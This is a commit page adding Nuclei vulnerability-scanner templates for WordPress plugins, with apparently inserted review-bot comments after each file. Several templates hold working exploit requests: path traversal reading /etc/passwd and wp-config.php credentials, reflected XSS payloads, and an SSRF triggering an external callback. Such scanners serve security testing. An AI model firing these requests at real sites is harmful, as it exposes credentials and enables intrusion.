
Commit

20241217
actions-user committed Dec 17, 2024
1 parent a4d1be1 commit 343cc22
Showing 59 changed files with 3,206 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241216
20241217
57 changes: 57 additions & 0 deletions poc.txt
@@ -0,0 +1,59 @@
id: password-protect-page-5bc1bd6076293fc447faec40c0b81b7b

info:
name: >
PPWP – Password Protect Pages <= 1.9.5 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d9ac0d84-dff4-4a03-a530-cac47ffaf2bb?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/password-protect-page/"
google-query: inurl:"/wp-content/plugins/password-protect-page/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,password-protect-page,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/password-protect-page/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "password-protect-page"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.9.5')
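Review bot: the `info` block ships with empty `description`, `cvss-metrics`, `cvss-score` and `cve-id` fields and a bare `shodan-query: 'vuln:'`, yet the template carries the `cve` tag and a name claiming an unauthenticated content-restriction bypass. Either fill those fields from the referenced Wordfence entry or drop the `cve` tag and the empty keys, so the template is not selected by `-tags cve` while having no CVE to report. The description should also say that this is a readme.txt version fingerprint (`Stable tag` <= 1.9.5), not an exercise of the bypass itself, and the word matcher on `password-protect-page` should be confirmed against a live readme, since a readme body does not necessarily contain the plugin's directory name.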
26 changes: 26 additions & 0 deletions poc/cve/CVE-2012-0896-2136.yaml
@@ -0,0 +1,26 @@
id: CVE-2012-0896
info:
name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
author: daffainfo
severity: high
description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
reference:
- https://packetstormsecurity.com/files/108631/
- https://www.cvedetails.com/cve/CVE-2012-0896
tags: cve,cve2012,lfi,wordpress,wp-plugin,traversal
classification:
cve-id: CVE-2012-0896
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
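Review bot: this template uses the legacy `requests:` key while the newer templates in the same commit (poc.txt, CVE-2023-47533, CVE-2024-10356) use `http:`; `requests:` is the deprecated spelling, so convert it for consistency. The `classification` block carries only `cve-id` and no `cvss-metrics`, `cvss-score` or `cwe-id`, which the other CVE templates here provide (CWE-22 would match the "absolute path traversal" wording of the description). The matchers themselves are sound: `root:.*:0:0:` plus status 200 on `f=/etc/passwd` confirms an actual file read rather than an echo of the parameter.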
25 changes: 25 additions & 0 deletions poc/cve/CVE-2012-2371-2179.yaml
@@ -0,0 +1,25 @@
id: CVE-2012-2371
info:
name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371
tags: cve,cve2012,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
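Review bot: `reference:` is a scalar here while every other template in the commit uses a list, and there is no `classification` block with a `cve-id` even though the `cve` and `cve2012` tags are set; add `classification` with `cve-id: CVE-2012-2371` and list-form references so metadata tooling treats this file like the rest. The payload hardcodes `page_id=1`, which assumes that page exists and renders the WP-FaceThumb pagination; the description should state that the page ID is a placeholder for a page embedding the plugin's output. Matching the unencoded `</script><script>alert(document.domain)</script>` in the body together with the `text/html` header check is the right test for an unescaped reflection.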
35 changes: 35 additions & 0 deletions poc/cve/CVE-2016-10924-2753.yaml
@@ -0,0 +1,35 @@
id: CVE-2016-10924

info:
name: Wordpress eBook Download < 1.2 - Directory Traversal
author: idealphase
severity: high
description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
reference:
- https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
- https://www.exploit-db.com/exploits/39575
- https://nvd.nist.gov/vuln/detail/CVE-2016-10924

classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2016-10924
cwe-id: CWE-22

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'

matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and

- type: status
status:
- 200
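Review bot: the `name` says "Directory Traversal", the `description` says "Local File Inclusion", and the request actually retrieves `wp-config.php` via `filedownload.php?ebookdownloadurl=../../../wp-config.php`, i.e. an arbitrary file download through path traversal (CWE-22, as the classification already states); align the wording, since an include-style LFI would execute the file as PHP and not return `DB_PASSWORD` in the body. This template also has no `tags:` line, so it is not reachable via `-tags wordpress,wp-plugin` like its neighbours. Requiring both `DB_NAME` and `DB_PASSWORD` with `condition: and` is a good choice: it avoids triggering on a generic error page that mentions only one of them.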
27 changes: 27 additions & 0 deletions poc/cve/CVE-2020-24148-4789.yaml
@@ -0,0 +1,27 @@
id: CVE-2020-24148

info:
name: Import XML & RSS Feeds Wordpress Plugin <= 2.0.1 SSRF

author: dwisiswant0
severity: critical
reference: https://github.com/dwisiswant0/CVE-2020-24148
description: |
Server-side request forgery (SSRF) in the Import XML and RSS Feeds (import-xml-feed)
plugin 2.0.1 for WordPress via the data parameter in a moove_read_xml action.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score: 9.10
cve-id: CVE-2020-24148
cwe-id: CWE-918

requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml"
body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0"
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
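Review bot: no `tags:` line, and the `description` says "plugin 2.0.1" while the `name` says "<= 2.0.1"; add tags (for example `cve,cve2020,wordpress,wp-plugin,ssrf`) and make the affected range consistent. The POST body is form-encoded (`type=url&data=...&xmlaction=preview&node=0`) but the request sets no `Content-Type` header; PHP only populates `$_POST` for `application/x-www-form-urlencoded` or `multipart/form-data`, so if the client does not add that header `moove_read_xml` never sees `data` and the interactsh callback never fires. Set `Content-Type: application/x-www-form-urlencoded` explicitly rather than relying on client defaults. Matching `interactsh_protocol` on `http` correctly demands a full HTTP callback rather than a DNS-only resolution, which is the stronger evidence for SSRF.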
38 changes: 38 additions & 0 deletions poc/cve/CVE-2021-24298-5684.yaml
@@ -0,0 +1,38 @@
id: CVE-2021-24298

info:
name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-24298
- https://codevigilant.com/disclosure/2021/wp-plugin-giveasap-xss/
- https://wpscan.com/vulnerability/30aebded-3eb3-4dda-90b5-12de5e622c91
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-24298
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
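Review bot: the path hardcodes `/giveaway/mygiveaways/`, but the description says the vulnerable `method` and `share` parameters belong to the Giveaway pages, whose slug is chosen by the site owner; `mygiveaways` looks like a placeholder taken from the reference write-up, so on most installs this returns 404 and the template reports nothing. Document that the giveaway slug must be adapted per target. Only `share` is exercised; `method` is the second parameter the description names and could be covered with an additional path entry using the same matchers.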
59 changes: 59 additions & 0 deletions poc/cve/CVE-2023-47533-06aab2b91df6cee595f800e3a7a1068a.yaml
@@ -0,0 +1,59 @@
id: CVE-2023-47533-06aab2b91df6cee595f800e3a7a1068a

info:
name: >
Countdown and CountUp, WooCommerce Sales Timer <= 1.8.2 - Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
author: topscoder
severity: low
description: >
The Countdown and CountUp, WooCommerce Sales Timer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.8.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/c1ec113c-d11f-4b0b-8d4a-46d37687b3b2?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N
cvss-score: 5.5
cve-id: CVE-2023-47533
metadata:
fofa-query: "wp-content/plugins/countdown-wpdevart-extended/"
google-query: inurl:"/wp-content/plugins/countdown-wpdevart-extended/"
shodan-query: 'vuln:CVE-2023-47533'
tags: cve,wordpress,wp-plugin,countdown-wpdevart-extended,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/countdown-wpdevart-extended/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "countdown-wpdevart-extended"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.8.2')
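Review bot: the description says the issue needs Administrator+ and only matters on multisite or where `unfiltered_html` is disabled, but the template is a passive readme fingerprint (`Stable tag` <= 1.8.2), so a hit means "version in range", not "exploitable here"; say so in the description, otherwise the output overstates findings on single-site installs where administrators can already post unfiltered HTML. Two extractors with an identical regex are both named `version`, one `internal: true` for the DSL and one exposed for display; that is this repository's convention, but a one-line comment would stop the next reader from treating it as a copy-paste error. Also note that `Stable tag: trunk`, which some plugins use, does not match `[0-9.]+`, so `version` stays unset and `compare_versions` fails closed (a false negative rather than a false positive). The `tags` line lacks a `cve2023` year tag, which the CVE-2012 and CVE-2021 templates in this commit include for their years.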
59 changes: 59 additions & 0 deletions poc/cve/CVE-2024-10356-1e614bbedd6f70b8c7be8b8186dbd8ab.yaml
@@ -0,0 +1,59 @@
id: CVE-2024-10356-1e614bbedd6f70b8c7be8b8186dbd8ab

info:
name: >
ElementsReady Addons for Elementor <= 6.4.8 - Authenticated (Contributor+) Sensitive Information Exposure via Elementor Templates
author: topscoder
severity: low
description: >
The ElementsReady Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.4.8 in inc/Widgets/accordion/output/content.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a48c91-7e2c-4708-b5af-dfbcfea08f83?source=api-prod
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2024-10356
metadata:
fofa-query: "wp-content/plugins/element-ready-lite/"
google-query: inurl:"/wp-content/plugins/element-ready-lite/"
shodan-query: 'vuln:CVE-2024-10356'
tags: cve,wordpress,wp-plugin,element-ready-lite,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/element-ready-lite/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "element-ready-lite"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 6.4.8')
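Review bot: same structure as CVE-2023-47533 above, so the same readme-fingerprint caveat applies: a 200 on `readme.txt` with `element-ready-lite` in the body and `Stable tag` <= 6.4.8 shows the installed version is in range, not that a Contributor account can reach the vulnerable code. The matchers are reasonably robust because all three are ANDed and the DSL needs a real `Stable tag` capture, so a soft-404 page that returns 200 and echoes `element-ready-lite` still fails on `compare_versions`. One gap: the description names the vulnerable file `inc/Widgets/accordion/output/content.php` but nothing in the template checks that it exists; a follow-up GET on that path would confirm the widget code is actually present rather than only the plugin's readme.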